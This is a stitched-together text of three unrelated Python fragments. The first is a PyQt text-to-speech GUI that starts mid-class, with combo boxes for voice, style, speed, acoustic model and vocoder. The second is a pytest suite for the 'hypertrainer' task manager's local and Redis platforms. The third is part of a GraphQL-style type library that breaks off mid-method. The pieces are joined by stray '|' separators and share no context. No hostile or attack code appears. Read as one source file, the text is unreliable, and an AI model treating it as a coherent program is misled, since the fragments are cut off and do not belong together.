self.tts_style_label = QLabel(self)
self.tts_style_label.move(160, 120)
self.tts_style_label.setText("风格:")
self.tts_style_combo = QComboBox(self)
self.tts_style_combo.addItem("正常")
self.tts_style_combo.addItem("机器楞")
self.tts_style_combo.addItem("高音")
self.tts_style_combo.addItem("低音")
self.tts_style_combo.move(240, 120)
self.tts_style_combo.resize(120, 40)
self.tts_style_combo.activated[str].connect(self.onTTSStyleComboboxChanged)
self.tts_speed_label = QLabel(self)
self.tts_speed_label.move(160, 160)
self.tts_speed_label.setText("速度:")
self.tts_speed_combo = QComboBox(self)
self.tts_speed_combo.addItem("1.0x")
self.tts_speed_combo.addItem("0.8x")
self.tts_speed_combo.addItem("1.2x")
self.tts_speed_combo.addItem("古神")
self.tts_speed_combo.move(240, 160)
self.tts_speed_combo.resize(120, 40)
self.tts_speed_combo.activated[str].connect(self.onTTSSpeedComboboxChanged)
# acoustic model
self.acoustic_model_label = QLabel(self)
self.acoustic_model_label.move(160, 200)
self.acoustic_model_label.setText("模型:")
self.acoustic_model_combo = QComboBox(self)
self.acoustic_model_combo.addItem("gst-fastspeech2")
self.acoustic_model_combo.addItem("fastspeech2")
self.acoustic_model_combo.addItem("gst-speedyspeech")
self.acoustic_model_combo.addItem("speedyspeech")
self.acoustic_model_combo.addItem("vae-fastspeech2")
self.acoustic_model_combo.move(240, 200)
self.acoustic_model_combo.resize(120, 40)
self.acoustic_model_combo.activated[str].connect(self.onAcousticModelComboboxChanged)
# # model path
# self.ref_audio_button = QPushButton('加载模型路径', self)
# self.ref_audio_button.move(20, 200)
# self.ref_audio_button.clicked.connect(self.loadRefWavFile)
# vocoder model
self.voc_model_label = QLabel(self)
self.voc_model_label.move(160, 240)
self.voc_model_label.setText("vocoder:")
self.voc_model_combo = QComboBox(self)
self.voc_model_combo.addItem("parallel wavegan")
self.voc_model_combo.addItem("hifigan")
self.voc_model_combo.move(240, 240)
self.voc_model_combo.resize(120, 40)
self.voc_model_combo.activated[str].connect(self.onVocModelComboboxChanged)
# ref audio
self.ref_audio_button = QPushButton('参考音频', self)
self.ref_audio_button.move(20, 240)
self.ref_audio_button.clicked.connect(self.loadRefWavFile)
self.ref_audio_label = QLabel(self)
self.ref_audio_label.move(160, 280)
self.ref_audio_label.resize(380, 40)
self.ref_audio_label.setText("未加载参考音频")
self.ref_audio_path = ""
self.show()
def initModel(self, tts_model=None):
# settings
# parse args and config and redirect to train_sp
self.ngpu = 0
self.style = "Normal"
self.speed = "1.0xspeed"
self.wav = None
if self.ngpu == 0:
paddle.set_device("cpu")
elif self.ngpu > 0:
paddle.set_device("gpu")
self.voice_cloning = None
self.onVoiceComboboxChanged(self.voice_combo.currentText())
self.onTTSStyleComboboxChanged(self.tts_style_combo.currentText())
self.onTTSSpeedComboboxChanged(self.tts_speed_combo.currentText())
self.onAcousticModelComboboxChanged(self.acoustic_model_combo.currentText())
self.onVocModelComboboxChanged(self.voc_model_combo.currentText())
print("gst,", self.use_gst)
print("vae,", self.use_vae)
def loadFrontend(self):
if self.acoustic_model == "fastspeech2":
self.frontend = Frontend(phone_vocab_path=self.phones_dict)
elif self.acoustic_model == "speedyspeech":
self.frontend = Frontend(phone_vocab_path=self.phones_dict, tone_vocab_path=self.tones_dict)
print("frontend done!")
def loadAcousticModel(self):
# acoustic model
if self.acoustic_model == "fastspeech2":
if self.use_gst:
self.fastspeech2_stat = "exp/gst_fastspeech2_azi_nanami/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/gst_fastspeech2_azi_nanami/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/gst_fastspeech2_azi_nanami/energy_stats.npy"
self.phones_dict = "exp/gst_fastspeech2_azi_nanami/phone_id_map.txt"
self.speaker_dict="exp/gst_fastspeech2_azi_nanami/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/gst_fastspeech2_azi_nanami/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/gst_fastspeech2_azi_nanami/checkpoints/snapshot_iter_111150.pdz"
elif self.use_vae:
self.fastspeech2_stat = "exp/vae_fastspeech2_azi_nanami/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/vae_fastspeech2_azi_nanami/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/vae_fastspeech2_azi_nanami/energy_stats.npy"
self.phones_dict = "exp/vae_fastspeech2_azi_nanami/phone_id_map.txt"
self.speaker_dict="exp/vae_fastspeech2_azi_nanami/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/gst_fastspeech2_azi_nanami/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/fastspeech2_bili3_aishell3/checkpoints/snapshot_iter_165560.pdz"
else:
self.fastspeech2_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/energy_stats.npy"
self.phones_dict = "exp/fastspeech2_bili3_aishell3_ljspeech/phone_id_map.txt"
self.speaker_dict="exp/fastspeech2_bili3_aishell3_ljspeech/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/fastspeech2_bili3_aishell3_ljspeech/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/fastspeech2_bili3_aishell3_ljspeech/checkpoints/snapshot_iter_165560.pdz"
with open(self.fastspeech2_config_path) as f:
self.fastspeech2_config = CfgNode(yaml.safe_load(f))
elif self.acoustic_model == "speedyspeech":
self.speedyspeech_config_path = "exp/speedyspeech_azi_nanami_new/default_multi.yaml"
self.speedyspeech_checkpoint = "exp/speedyspeech_azi_nanami_new/checkpoints/snapshot_iter_24037.pdz"
self.speedyspeech_stat = "exp/speedyspeech_azi_nanami_new/feats_stats.npy"
self.tones_dict = "exp/speedyspeech_azi_nanami_new/tone_id_map.txt"
self.phones_dict = "exp/speedyspeech_azi_nanami_new/phone_id_map.txt"
self.speaker_dict="exp/speedyspeech_azi_nanami_new/speaker_id_map.txt"
with open(self.speedyspeech_config_path) as f:
self.speedyspeech_config = CfgNode(yaml.safe_load(f))
fields = ["utt_id", "text"]
self.spk_num = None
if self.speaker_dict:
print("multiple speaker")
with open(self.speaker_dict, 'rt') as f:
spk_id_list = [line.strip().split() for line in f.readlines()]
self.spk_num = len(spk_id_list)
fields += ["spk_id"]
elif self.voice_cloning:
print("voice cloning!")
fields += ["spk_emb"]
else:
print("single speaker")
print("spk_num:", self.spk_num)
with open(self.phones_dict, "r", encoding='UTF-8') as f:
phn_id = [line.strip().split() for line in f.readlines()]
vocab_size = len(phn_id)
print("vocab_size:", vocab_size)
if self.acoustic_model == "fastspeech2":
print("fastspeech2")
odim = self.fastspeech2_config.n_mels
self.model = FastSpeech2(
idim=vocab_size, odim=odim, **self.fastspeech2_config["model"], spk_num=self.spk_num, use_gst=self.use_gst, use_vae=self.use_vae)
self.model.set_state_dict(
paddle.load(self.fastspeech2_checkpoint)["main_params"])
self.model.eval()
print("fastspeech2 model done!")
elif self.acoustic_model == "speedyspeech":
print("speedyspeech")
tone_size = None
if self.tones_dict:
with open(self.tones_dict, "r") as f:
tone_id = [line.strip().split() for line in f.readlines()]
tone_size = len(tone_id)
print("tone_size:", tone_size)
if self.use_gst:
self.messageDialog("暂时不支持")
return
else:
self.model = SpeedySpeech(
vocab_size=vocab_size, tone_size=tone_size, spk_num=self.spk_num, **self.speedyspeech_config["model"])
self.model.set_state_dict(
paddle.load(self.speedyspeech_checkpoint)["main_params"])
self.model.eval()
print("speedyspeech model done!")
def loadVocoderModel(self):
# vocoder
class_map = {
"hifigan": "HiFiGANGenerator",
"mb_melgan": "MelGANGenerator",
"pwgan": "PWGGenerator",
"style_melgan": "StyleMelGANGenerator",
}
if self.vocoder == "pwg":
self.pwg_config_path = "pretrained_models/pwg_aishell3_ckpt_0.5/default.yaml"
self.pwg_checkpoint = "pretrained_models/pwg_aishell3_ckpt_0.5/snapshot_iter_1000000.pdz"
self.pwg_stat = "pretrained_models/pwg_aishell3_ckpt_0.5/feats_stats.npy"
with open(self.pwg_config_path) as f:
self.pwg_config = CfgNode(yaml.safe_load(f))
checkpoint = self.pwg_checkpoint
config = self.pwg_config
generator_type = "pwgan"
elif self.vocoder == "hifigan":
self.hifigan_config_path = "pretrained_models/hifigan_azi_nanami/default.yaml"
self.hifigan_checkpoint = "pretrained_models/hifigan_azi_nanami/checkpoints/snapshot_iter_310000.pdz"
self.hifigan_stat = "pretrained_models/hifigan_azi_nanami/feats_stats.npy"
with open(self.hifigan_config_path) as f:
self.hifigan_config = CfgNode(yaml.safe_load(f))
checkpoint = self.hifigan_checkpoint
config = self.hifigan_config
generator_type = "hifigan"
generator_class = getattr(ttsModels,
class_map[generator_type])
self.generator = generator_class(**config["generator_params"])
state_dict = paddle.load(checkpoint)
self.generator.set_state_dict(state_dict["generator_params"])
self.generator.remove_weight_norm()
self.generator.eval()
print("vocoder model done!")
@pyqtSlot()
def onGenerateButtonClicked(self):
if self.ref_audio_path == "" and (self.use_gst or self.use_vae):
self.messageDialog("请先选择参考音频!")
return
textboxValue = self.textbox.text()
if textboxValue == "":
self.messageDialog("输入不能为空!")
return
sentences = []
sentences.append(("001", textboxValue))
if self.acoustic_model == "fastspeech2":
stat = np.load(self.fastspeech2_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
fastspeech2_normalizer = ZScore(mu, std)
elif self.acoustic_model == "speedyspeech":
stat = np.load(self.speedyspeech_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
speedyspeech_normalizer = ZScore(mu, std)
if self.vocoder == "pwg":
stat = np.load(self.pwg_stat)
elif self.vocoder == "hifigan":
stat = np.load(self.hifigan_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
vocoder_normalizer = ZScore(mu, std)
if self.acoustic_model == "fastspeech2":
fastspeech2_inference = StyleFastSpeech2Inference(
fastspeech2_normalizer, self.model, self.fastspeech2_pitch_stat,
self.fastspeech2_energy_stat)
fastspeech2_inference.eval()
elif self.acoustic_model == "speedyspeech":
speedyspeech_inference = SpeedySpeechInference(
speedyspeech_normalizer, self.model)
speedyspeech_inference.eval()
if self.vocoder == "pwg":
vocoder_inference = PWGInference(vocoder_normalizer, self.generator)
elif self.vocoder == "hifigan":
vocoder_inference = HiFiGANInference(vocoder_normalizer, self.generator)
vocoder_inference.eval()
robot = False
durations = None
durations_scale = None
durations_bias = None
pitch = None
pitch_scale = None
pitch_bias = None
energy = None
energy_scale = None
energy_bias = None
if self.tts_style_combo.currentText() == "机器楞":
self.style = "robot"
elif self.tts_style_combo.currentText() == "高音":
self.style = "high_voice"
elif self.tts_style_combo.currentText() == "低音":
self.style = "low_voice"
if self.tts_speed_combo.currentText() == "1.2x":
self.speed = "1.2xspeed"
elif self.tts_speed_combo.currentText() == "0.8x":
self.speed = "0.8xspeed"
elif self.tts_speed_combo.currentText() == "古神":
self.speed = "3.0xspeed"
if self.style == "robot":
# all tones in phones be `1`
# all pitch should be the same, we use mean here
robot = True
if self.speed == "1.2xspeed":
durations_scale = 1.2
elif self.speed == "1.0xspeed":
durations_scale = 1
elif self.speed == "0.8xspeed":
durations_scale = 0.8
elif self.speed == "3.0xspeed":
durations_scale = 3.0
if self.style == "high_voice":
pitch_scale = 1.3
elif self.style == "low_voice":
pitch_scale = 0.7
elif self.style == "normal":
pitch_scale = 1
record = None
try:
wav, _ = librosa.load(str(self.ref_audio_path), sr=self.fastspeech2_config.fs)
if len(wav.shape) != 1 or np.abs(wav).max() > 1.0:
return record
assert len(wav.shape) == 1, f"ref audio is not a mono-channel audio."
assert np.abs(wav).max(
) <= 1.0, f"ref audio is seems to be different that 16 bit PCM."
mel_extractor = LogMelFBank(
sr=self.fastspeech2_config.fs,
n_fft=self.fastspeech2_config.n_fft,
hop_length=self.fastspeech2_config.n_shift,
win_length=self.fastspeech2_config.win_length,
window=self.fastspeech2_config.window,
n_mels=self.fastspeech2_config.n_mels,
fmin=self.fastspeech2_config.fmin,
fmax=self.fastspeech2_config.fmax)
logmel = mel_extractor.get_log_mel_fbank(wav)
# normalize, restore scaler
speech_scaler = StandardScaler()
speech_scaler.mean_ = np.load(self.fastspeech2_stat)[0]
speech_scaler.scale_ = np.load(self.fastspeech2_stat)[1]
speech_scaler.n_features_in_ = speech_scaler.mean_.shape[0]
logmel = speech_scaler.transform(logmel)
speech = paddle.to_tensor(logmel)
except:
speech = None
for utt_id, sentence in sentences:
if self.acoustic_model == "fastspeech2":
input_ids = self.frontend.get_input_ids(
sentence, merge_sentences=True, robot=robot)
elif self.acoustic_model == "speedyspeech":
input_ids = self.frontend.get_input_ids(
sentence, merge_sentences=True, get_tone_ids=True)
try:
phone_ids = input_ids["phone_ids"][0]
except:
self.messageDialog("输入的文字不能识别,请重新输入!")
return
print("self.spk_id", self.spk_id)
self.spk_id = paddle.to_tensor(self.spk_id)
# self.spk_id = None # temp
with paddle.no_grad():
if self.acoustic_model == "fastspeech2":
mel = fastspeech2_inference(
phone_ids,
durations_scale=durations_scale,
durations_bias=durations_bias,
pitch_scale=pitch_scale,
pitch_bias=pitch_bias,
energy_scale=energy_scale,
energy_bias=energy_bias,
robot=robot,
spk_id=self.spk_id,
speech=speech,
)
elif self.acoustic_model == "speedyspeech":
tone_ids = paddle.to_tensor(input_ids["tone_ids"][0])
mel = speedyspeech_inference(
phone_ids,
tone_ids,
spk_id=self.spk_id
)
print("mel infer done")
self.wav = vocoder_inference(mel)
print("vocoder infer done")
print(f"{self.style}_{utt_id} done!")
self.playAudioFile()
def saveWavFile(self):
if type(self.wav) != type(None):
dialog = QFileDialog()
dialog.setDefaultSuffix(".wav")
fpath, _ = dialog.getSaveFileName(
parent=self,
caption="Select a path to save the audio file",
filter="Audio Files (*.flac *.wav)"
)
if fpath:
if Path(fpath).suffix == "":
fpath += ".wav"
sf.write(fpath, self.wav.numpy(), samplerate=self.fastspeech2_config.fs)
else:
self.messageDialog("还没有合成声音,无法保存!")
def loadRefWavFile(self):
'''
setFileMode():
QFileDialog.AnyFile,任何文件
QFileDialog.ExistingFile,已存在的文件
QFileDialog.Directory,文件目录
QFileDialog.ExistingFiles,已经存在的多个文件
'''
dialog = QFileDialog()
dialog.setFileMode(QFileDialog.ExistingFile)
# dlg.setFilter(QDir.Files)
if dialog.exec_():
filenames= dialog.selectedFiles()
self.ref_audio_path = filenames[0]
self.ref_audio_label.setText("已加载:" + os.path.basename(filenames[0]))
def onVoiceComboboxChanged(self, text):
if text == "阿梓":
self.spk_id = 175
elif text == "海子姐":
self.spk_id = 176
def onTTSStyleComboboxChanged(self, text):
if text == "正常":
self.style = "normal"
elif text == "机器楞":
self.style = "robot"
elif text == "高音":
self.style = "high_voice"
elif text == "低音":
self.style = "low_voice"
def onTTSSpeedComboboxChanged(self, text):
if text == "1.0x":
self.speed = "1.0xspeed"
elif text == "1.2x":
self.speed = "1.2xspeed"
elif text == "0.8x":
self.speed = "0.8xspeed"
elif text == "古神":
self.speed = "3.0xspeed"
def onAcousticModelComboboxChanged(self, text):
if text == "gst-fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_gst = True
self.use_vae = False
elif text == "fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_gst = False
self.use_vae = False
elif text == "gst-speedyspeech":
self.messageDialog("暂不支持")
return
elif text == "speedyspeech":
self.acoustic_model = "speedyspeech"
self.use_gst = False
elif text == "vae-fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_vae = True
self.use_gst = False
self.onVoiceComboboxChanged(self.voice_combo.currentText())
self.loadAcousticModel()
self.loadFrontend()
def onVocModelComboboxChanged(self, text):
if text == "parallel wavegan":
self.vocoder = "pwg"
elif text == "hifigan":
self.vocoder = "hifigan"
self.loadVocoderModel()
def playAudioFile(self):
if type(self.wav) == type(None):
self.messageDialog("请先合成音频!")
return
try:
sd.stop()
sd.play(self.wav, self.fastspeech2_config.fs)
except Exception as e:
print(e)
self.log("Error in audio playback. Try selecting a different audio output device.")
self.log("Your device must be connected before you start the toolbox.")
def messageDialog(self, text):
msg_box = QMessageBox(QMessageBox.Warning, '错误', text)
msg_box.exec_()
# def onClickedGST(self):
# if self.use_gst_button.isChecked():
# self.use_gst = True
# else:
# self.use_gst = False
# self.loadAcousticModel()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_()) |
import os
from pathlib import Path
from time import sleep
import pytest
# Trick for initializing a test database
from hypertrainer.utils import TaskStatus, yaml, deep_assert_equal, TestState
TestState.test_mode = True
from hypertrainer.experimentmanager import experiment_manager
from hypertrainer.computeplatformtype import ComputePlatformType
from hypertrainer.htplatform import HtPlatform
from hypertrainer.task import Task
scripts_path = Path(__file__).parent / 'scripts'
# Make sure we will work on a separate, empty test database
assert Task.select().count() == 0, 'Must work on empty test db'
def test_export_yaml():
experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
tmpfile = Path('/tmp/httest.yaml')
if tmpfile.exists():
tmpfile.unlink()
experiment_manager.export_yaml(str(tmpfile))
# TODO perform more checks
class TestLocal:
def test_output_path(self):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_simple.yaml'),
platform='local')
task = tasks[0]
assert 'output_root' in task.config
assert Path(task.output_root).exists()
output_path = task.output_path
assert Path(output_path).exists()
def test_other_cwd(self):
"""Test that experiment_manager works independently from working dir"""
old_cwd = os.getcwd()
try:
os.mkdir('/tmp/hypertrainer') # TODO windows friendly?
except FileExistsError:
pass
os.chdir('/tmp/hypertrainer')
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_simple.yaml'),
platform='local')
task = tasks[0]
assert Path(task.project_path).exists()
assert Path(task.script_file).exists()
assert Path(task.output_root).exists()
assert Path(task.output_path).exists()
os.chdir(old_cwd)
def test_submit(self):
# 1. Launch task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_ids = [t.id for t in tasks]
# 2. Check that the hp search configs were generated
assert len(tasks) == 3
# Wait task finished
def check_finished():
experiment_manager.update_tasks([ComputePlatformType.LOCAL])
status = Task.get(Task.id == tasks[2].id).status
return status == TaskStatus.Finished
wait_true(check_finished, interval_secs=0.5)
# 3. Check stuff on each task
p_exp10_values, p_exp2_values, p_lin_values = set(), set(), set()
orig_yaml = yaml.load(scripts_path / 'test_hp.yaml')
for t in Task.select().where(Task.id.in_(task_ids)): # type: Task
# Check that yaml has been written correctly
# NOTE: THIS FAILS IN DEBUG MODE
deep_assert_equal(t.config, orig_yaml, exclude_keys=['output_path', 'is_child', 'dummy_param_exp10',
'dummy_param_exp2', 'dummy_param_lin'])
# Check output
experiment_manager.monitor(t)
assert t.logs['err'].strip() == 'printing to stderr'
assert t.logs['out'].strip() == 'printing to stdout'
# Check status
assert t.status == TaskStatus.Finished
# Check hyperparam search
p_exp10 = t.config['training']['dummy_param_exp10']
p_exp2 = t.config['training']['dummy_param_exp2']
p_lin = t.config['training']['dummy_param_lin']
# Hyperparam value must be unique
assert p_exp10 not in p_exp10_values
assert p_exp2 not in p_exp2_values
assert p_lin not in p_lin_values
p_exp10_values.add(p_exp10)
p_exp2_values.add(p_exp2)
p_lin_values.add(p_lin)
# Hyperparameter values must be in range
assert 10 ** -2 <= p_exp10 <= 10 ** 2
assert 2 ** -2 <= p_exp2 <= 2 ** 2
assert -2 <= p_lin <= 2
def test_archive(self):
# 1. Submit local task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# 2. Archive task
experiment_manager.archive_tasks_by_id([task_id])
# 3. Check that it still exists
assert Task.select().where(Task.id == task_id).count() == 1
# 4. Check that is_archived == True
assert Task.get(Task.id == task_id).is_archived
# 5. Check that it is absent from the non-archived list
non_archived_tasks = experiment_manager.get_tasks(platform=ComputePlatformType.LOCAL)
assert task_id not in [t.id for t in non_archived_tasks]
# 6. Check that it is present in the archived list
archived_tasks = experiment_manager.get_tasks(archived=True, platform=ComputePlatformType.LOCAL)
assert task_id in [t.id for t in archived_tasks]
def test_unarchive(self):
# Submit local task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# Archive task
experiment_manager.archive_tasks_by_id([task_id])
# Unarchive task
experiment_manager.unarchive_tasks_by_id([task_id])
# Check that is_archived == False
assert not Task.get(Task.id == task_id).is_archived
# Check that it is present in the non-archived list
non_archived_tasks = experiment_manager.get_tasks(platform=ComputePlatformType.LOCAL)
assert task_id in [t.id for t in non_archived_tasks]
# Check that it is absent from the archived list
archived_tasks = experiment_manager.get_tasks(archived=True, platform=ComputePlatformType.LOCAL)
assert task_id not in [t.id for t in archived_tasks]
def test_delete(self):
def get_task_folder(task_id):
return Path(Task.get(Task.id == task_id).output_path)
# 1. Submit task
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
task_id = tasks[0].id
# 1.1 Wait that the folder exist on disk
wait_true(lambda: get_task_folder(task_id).exists())
task_folder = get_task_folder(task_id)
# 2. Try deleting task (fails since not archived yet)
with pytest.raises(RuntimeError):
experiment_manager.delete_tasks_by_id([task_id])
# 3. Archive task
experiment_manager.archive_tasks_by_id([task_id])
assert Task.get(Task.id == task_id).is_archived
# 4. Delete task
experiment_manager.delete_tasks_by_id([task_id])
# 5. Check that task does not exist in DB
assert Task.select().where(Task.id == task_id).count() == 0
# 6. Check that files on disk have been deleted
wait_true(lambda: not task_folder.exists())
def test_cancel(self):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_long.yaml'),
platform='local')
task_id = tasks[0].id
experiment_manager.cancel_tasks_by_id([task_id])
def check_cancelled():
experiment_manager.update_tasks([ComputePlatformType.LOCAL])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Cancelled
wait_true(check_cancelled)
@pytest.fixture
def ht_platform():
_ht_platform = HtPlatform()
experiment_manager.platform_instances[ComputePlatformType.HT] = _ht_platform
try:
answers = _ht_platform.ping_workers()
except (ConnectionError, ConnectionRefusedError):
raise Exception('Could not connect to Redis. Make sure redis-server is running.')
except TimeoutError:
raise Exception('The ping timed out. A worker must listen queue \'localhost\'')
assert answers == ['localhost']
return _ht_platform
@pytest.fixture
def ht_platform_same_thread():
_ht_platform = HtPlatform(same_thread=True)
experiment_manager.platform_instances[ComputePlatformType.HT] = _ht_platform
return _ht_platform
class TestRq:
def test_submit(self, ht_platform):
# Submit rq task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_simple.yaml'))
# Check that the task has status Waiting
assert tasks[0].status == TaskStatus.Waiting
sleep(0.2) # FIXME this is too flaky
task_id = tasks[0].id
experiment_manager.update_tasks([ComputePlatformType.HT])
assert experiment_manager.get_tasks_by_id([task_id])[0].status == TaskStatus.Running
# Check that the task finishes successfully
wait_task_finished(task_id, interval_secs=2, tries=6)
def test_submit_multiple(self, ht_platform):
# Submit rq task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_hp.yaml'))
# Check that the task finishes successfully
wait_task_finished(tasks[0].id, interval_secs=1, tries=8)
def test_delete(self, ht_platform):
# Submit task
tasks = experiment_manager.create_tasks(
platform='ht',
config_file=str(scripts_path / 'test_simple.yaml'))
task_id = tasks[0].id
# Wait task finish
wait_task_finished(task_id, interval_secs=2, tries=3)
# Try deleting task (fails since not archived yet)
with pytest.raises(RuntimeError):
experiment_manager.delete_tasks_by_id([task_id])
# Archive task
experiment_manager.archive_tasks_by_id([task_id])
task = Task.get(Task.id == task_id)
assert task.is_archived
# Check that the output path exists
assert Path(task.output_path).exists()
# Delete task
experiment_manager.delete_tasks_by_id([task_id])
# Check that task does not exist in DB
assert Task.select().where(Task.id == task_id).count() == 0
# Check that files on disk have been deleted
wait_true(lambda: not Path(task.output_path).exists())
# Check that the job does not exist in the worker's db
info_dicts = ht_platform._get_info_dict_for_each_worker()
assert len(info_dicts) == 1
worker_db = info_dicts[0]
assert task.job_id not in worker_db
def test_cancel(self, ht_platform):
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_long.yaml'),
platform='ht')
task_id = tasks[0].id
# Check that the task is running
def check_running():
experiment_manager.update_tasks([ComputePlatformType.HT])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Running
wait_true(check_running)
experiment_manager.cancel_tasks_by_id([task_id])
# Check that the task is cancelled
def check_cancelled():
experiment_manager.update_tasks([ComputePlatformType.HT])
t = experiment_manager.get_tasks_by_id([task_id])[0]
return t.status == TaskStatus.Cancelled
wait_true(check_cancelled)
def test_acquire_one_gpu(self, monkeypatch, ht_platform_same_thread):
monkeypatch.setenv('CUDA_VISIBLE_DEVICES', '0,1')
tasks = experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_gpu_1.yaml'),
platform='ht')
t1_id = tasks[0].id
wait_task_finished(t1_id, interval_secs=1, tries=3)
t1 = experiment_manager.get_tasks_by_id([t1_id])[0]
experiment_manager.monitor(t1)
assert t1.logs['out'].strip() == 'gpu_id=0'
def wait_true(fn, interval_secs=0.4, tries=6):
for i in range(tries):
if fn():
return
else:
sleep(interval_secs)
raise TimeoutError
def wait_task_finished(task_id, interval_secs=0.4, tries=6):
def get_status():
experiment_manager.update_tasks()
return Task.get(Task.id == task_id).status
for i in range(tries):
status = get_status()
if status == TaskStatus.Finished:
return
elif status in (TaskStatus.Running, TaskStatus.Waiting):
sleep(interval_secs)
else:
experiment_manager.print_output(task_id)
raise ChildProcessError(str(status))
raise TimeoutError
|
from functools import reduce
from . import GraphError, iterables
from .memo import lambdaize, memoize
from .representations import Object
_undefined = object()
class ScalarType(object):
def __init__(self, name, coerce):
self.name = name
self._coerce = coerce
def __call__(self):
return ScalarQuery(self)
def __str__(self):
return self.name
def child_types(self):
return ()
def coerce(self, value):
return self._coerce(value)
def _coerce_boolean(value):
if isinstance(value, bool):
return value
else:
raise _coercion_error(value, Boolean)
Boolean = ScalarType("Boolean", coerce=_coerce_boolean)
def _coerce_float(value):
if isinstance(value, float):
return value
elif isinstance(value, int):
coerced = float(value)
if coerced == value:
return coerced
raise _coercion_error(value, Float)
Float = ScalarType("Float", coerce=_coerce_float)
def _coerce_int(value):
if isinstance(value, int):
return value
else:
raise _coercion_error(value, Int)
Int = ScalarType("Int", coerce=_coerce_int)
def _coerce_string(value):
if isinstance(value, str):
return value
else:
raise _coercion_error(value, String)
String = ScalarType("String", coerce=_coerce_string)
class ScalarQuery(object):
def __init__(self, type):
self.type = type
def for_type(self, target_type):
if self.type == target_type:
return self
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, ScalarQuery):
return NotImplemented
elif self.type != other.type:
raise TypeError("cannot add queries for different scalar types: {} and {}".format(
self.type,
other.type,
))
else:
return self
def __str__(self):
return "ScalarQuery(type={})".format(self.type)
class EnumType(object):
def __init__(self, enum):
self.enum = enum
@property
def name(self):
return self.enum.__name__
def __call__(self):
return EnumQuery(self)
def __str__(self):
return self.name
def child_types(self):
return ()
def coerce(self, value):
if isinstance(value, self.enum):
return value
else:
raise _coercion_error(value, self)
class EnumQuery(object):
def __init__(self, type):
self.type = type
def for_type(self, target_type):
if self.type == target_type:
return self
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, EnumQuery):
return NotImplemented
elif self.type != other.type:
raise TypeError("cannot add queries for different enum types: {} and {}".format(
self.type,
other.type,
))
else:
return self
def __str__(self):
return "EnumQuery(type={})".format(self.type)
class InputObjectType(object):
def __init__(self, name, fields):
self.name = name
self.fields = Fields(name, fields)
self.instance_type = memoize(self._create_instance_type)
def _create_instance_type(self):
name = self.name
def __init__(self, values):
self._values = values
for key in values:
setattr(self, key, values[key])
def __eq__(self, other):
if isinstance(other, instance_type):
return self._values == other._values
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return "{}({})".format(name, ", ".join(
"{}={!r}".format(key, value)
for key, value in self._values.items()
))
instance_type = type(
self.name,
(object, ),
dict(
__init__=__init__,
__repr__=__repr__,
__eq__=__eq__,
__ne__=__ne__,
),
)
return instance_type
def __call__(self, **explicit_field_values):
def get_field_value(field):
value = explicit_field_values.pop(field.name, field.default)
if value is _undefined:
raise GraphError("{} is missing required field {}".format(self.name, field.name))
else:
return value
field_values = iterables.to_dict(
(field.name, get_field_value(field))
for field in self.fields
)
if explicit_field_values:
key = next(iter(explicit_field_values))
raise GraphError("{} has no field {}".format(self.name, key))
return self.instance_type()(field_values)
def __repr__(self):
return "InputObjectType(name={!r})".format(self.name)
def child_types(self):
return tuple(
field.type
for field in self.fields
)
def coerce(self, value):
if isinstance(value, self.instance_type()):
return value
else:
raise _coercion_error(value, self.name)
def input_field(name, type, default=_undefined):
return InputField(name, type, default)
class InputField(object):
def __init__(self, name, type, default):
self.name = name
self.type = type
self.default = default
@property
def has_default(self):
return self.default is not _undefined
def __repr__(self):
return "InputField(name={!r}, type={!r})".format(self.name, self.type)
class InterfaceType(object):
def __init__(self, name, fields):
self.name = name
self.fields = Fields(name, fields)
def __call__(self, *field_queries):
return ObjectQuery.create(self, field_queries=field_queries)
def query(self, *, field_queries, create_object):
return ObjectQuery.create(self, field_queries=field_queries, create_object=create_object)
def __repr__(self):
return "InterfaceType(name={!r})".format(self.name)
def __str__(self):
return self.name
def child_types(self):
return _fields_child_types(self.fields)
class ListType(object):
def __init__(self, element_type):
self.element_type = element_type
def __call__(self, *args, **kwargs):
return ListQuery(self, self.element_type(*args, **kwargs))
def query(self, *args, **kwargs):
